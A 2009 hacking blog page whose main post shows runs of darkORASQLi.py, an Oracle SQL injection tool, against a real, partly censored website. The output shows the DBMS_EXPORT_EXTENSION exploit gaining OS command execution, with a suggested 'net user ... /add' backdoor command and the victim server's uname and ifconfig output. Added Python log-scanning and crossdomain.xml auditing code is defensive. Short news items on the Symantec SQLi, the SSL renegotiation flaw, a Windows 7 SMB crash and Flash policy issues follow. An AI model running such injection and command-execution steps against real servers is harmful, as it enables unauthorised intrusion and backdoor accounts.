Sunday, November 29, 2009

Multi Purpose Oracle SQL Injection Tool with darkORASQLi.py

After successfully developing a PostgreSQL injection tool, darkc0de will release a new tool for Oracle SQL injection. If you have ever heard about darkMYSQLi, darkMSSQLi, or darkPGSQLi, I think this tool will be useful for you all, especially penetration testers or security consultants. This tool is 80% working and will be released later.


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=1001039735'" --pwn
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=1001039735'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"

--cmd "/bin/uname -a"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux asahan 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux

[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

--cmd "/sbin/ifconfig"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DC
inet addr:10.100.88.31 Bcast:10.100.88.255 Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)

[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, keep r0x darkc0de!
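As an added defender-side example (not part of the original post or of the darkc0de tool), the following Python scans Apache access-log lines for the probe shape visible in the runs above: a single quote appended to a numeric id parameter, the DBMS_EXPORT_EXTENSION name, and the quote-then-"--" comment suffix the tool lists under Evasion. The log lines, client IPs, timestamps and the assumption that id must be numeric are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format log lines (not from the original post); client IPs,
# timestamps and sizes are assumptions. Lines 2-3 mimic the probe shape shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2009:10:46:50 +0800] "GET /detail.jsp?id=1001039735 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Nov/2009:10:46:54 +0800] "GET /detail.jsp?id=1001039735' HTTP/1.1" 500 312 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.51.100.7 - - [29/Nov/2009:10:46:55 +0800] "GET /detail.jsp?id=1001039735%27+DBMS_EXPORT_EXTENSION-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
10.0.0.9 - - [29/Nov/2009:10:47:01 +0800] "GET /detail.jsp?id=1001039740 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
"""

NUMERIC_PARAMS = {"id"}  # parameters the application expects to be purely numeric (assumption)
# Oracle-specific name from the post plus the quote-then-comment shape of "Evasion: + --".
INDICATORS = re.compile(r"dbms_export_extension|'.*--", re.IGNORECASE)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_reasons(target):
    """Return why a request target looks like an injection probe (empty list if it looks clean)."""
    reasons = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.append(f"non-numeric {name}={value!r}")
    if INDICATORS.search(unquote_plus(query)):
        reasons.append("oracle injection indicator in query string")
    return reasons

def scan(log_text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (reasons := suspicious_reasons(rec["target"])):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "target": rec["target"],
                             "status": int(rec["status"]), "reasons": reasons})
    return findings

def probes_per_source(findings):
    """Count suspicious requests per client; the tool above reports 5 URL requests per run."""
    return Counter(f["ip"] for f in findings)
```

A 500 on the quoted request followed by 200s on the same parameter from the same client, as in the sample, is the sequence worth alerting on: the error confirms the quote reached the database and the later requests are the tool continuing.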

Strong Password

To protect your computer, your data and your online accounts, you should have a strong password. If your password is weak, you make it easier for someone to break in. Hackers make their livelihood by automating ways to continually search out the weakest link to gain access to a network or computer.

Please read these links for Password Security Awareness:
http://www.microsoft.com/protect/fraud/passwords/create.aspx
http://www.utexas.edu/its/secure/articles/keep_safe_with_strong_passwords.php

To check the strength of your password, you can use Password Checker:
http://www.microsoft.com/protect/fraud/passwords/checker.aspx

Symantec Online Store Hacked

A self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle of Unu, according to whom an insecure parameter of a script on the pcd.symantec.com website allows a blind SQL injection (SQLi) attack to be performed. In such an attack, the hacker obtains read and/or write permission to the underlying database of the vulnerable website.

During a regular SQLi attack, the result of a rogue SQL query is displayed inside the browser instead of the normal web page output. Meanwhile, in a blind SQL injection, the query executes, but the website continues to display normally, making it much more difficult to extract information.

Please read here for more details:
http://news.softpedia.com/news/Symantec-Online-Store-Hacked-127726.shtml

Friday, November 13, 2009

Opinion: Can the SSL vulnerability hurt you?

ComputerWorld Security:

The security blogosphere is agog over some recently published vulnerability information describing attacks against the venerable SSL protocol -- you know, the one that almost the entire Internet relies on for securing transactions as they transit the Net. But how does this impact you? Let's try to separate the wheat from the chaff.

Let's start by looking at the vulnerability itself. It is a "man-in-the-middle" (MitM) attack in which an attacker can use an SSL feature called "negotiation" to inject bad stuff into an SSL session. Right, so that's not good news. But the sky isn't exactly falling yet, so we can all remain calm for now. Let's put things into perspective here.

Yes, by all accounts, there seems to be a serious weakness in SSL. As of right now, however, that weakness is known to a relatively small collection of folks who are working to come up with some solutions to the problem. That said, the technical details of the problem have been published, and there's little doubt that attacks will begin to surface over time.

More info, please read here.

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is a real proof that SDL #FAIL
The bug triggers an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be triggered outside the LAN via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:
See: http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

Saturday, November 07, 2009

Facebook and Myspace bolt Flash backdoors

Web developer Yvo Schaap has discovered that Facebook and Myspace have been overgenerous in assigning privileges for Flash applications, allowing Schaap's Flash application to access another user's entire Facebook data.

Flash applications are normally only able to access resources on the server from which they have been loaded. In order to allow developers to design applications with more flexibility, Adobe has, however, introduced the option of explicitly granting access to other servers. This is achieved by means of the crossdomain.xml file in a web server's root folder. Facebook had used this to grant the right to access the main domain to trusted sites via instructions such as:

More information:
http://www.h-online.com/security/news/item/Facebook-and-Myspace-bolt-Flash-backdoors-852318.html
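As an added illustration (not the page's, Facebook's or Adobe's own code), here is a small Python auditor that parses a crossdomain.xml and reports allow-access-from entries broader than an explicit allow-list, which is the overgenerous grant the post describes. The two policies and the domain names are constructed assumptions; the secure attribute check goes slightly beyond the post by also flagging entries that admit plain-http origins.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies for this example (not Facebook's, Myspace's or Adobe's files).
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
  <allow-access-from domain="*.example-partner.com" secure="false" />
</cross-domain-policy>
"""

TIGHT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="apps.example.com" secure="true" />
</cross-domain-policy>
"""

def audit_crossdomain(policy_xml, trusted_domains):
    """Return findings for allow-access-from entries broader than the trust list.

    trusted_domains: exact hostnames whose Flash content the site deliberately lets
    read its responses with the visitor's session (an assumed allow-list).
    """
    root = ET.fromstring(policy_xml)
    findings = []
    for entry in root.findall("allow-access-from"):
        domain = entry.get("domain", "")
        secure = entry.get("secure", "true").lower()
        if domain == "*":
            findings.append(f"{domain}: any site may read this host's data with the user's session")
        elif domain.startswith("*."):
            findings.append(f"{domain}: wildcard admits every subdomain, including user-controlled ones")
        elif domain not in trusted_domains:
            findings.append(f"{domain}: not on the trust list")
        if secure == "false":
            findings.append(f"{domain}: secure=\"false\" lets plain-http origins reach https content")
    return findings
```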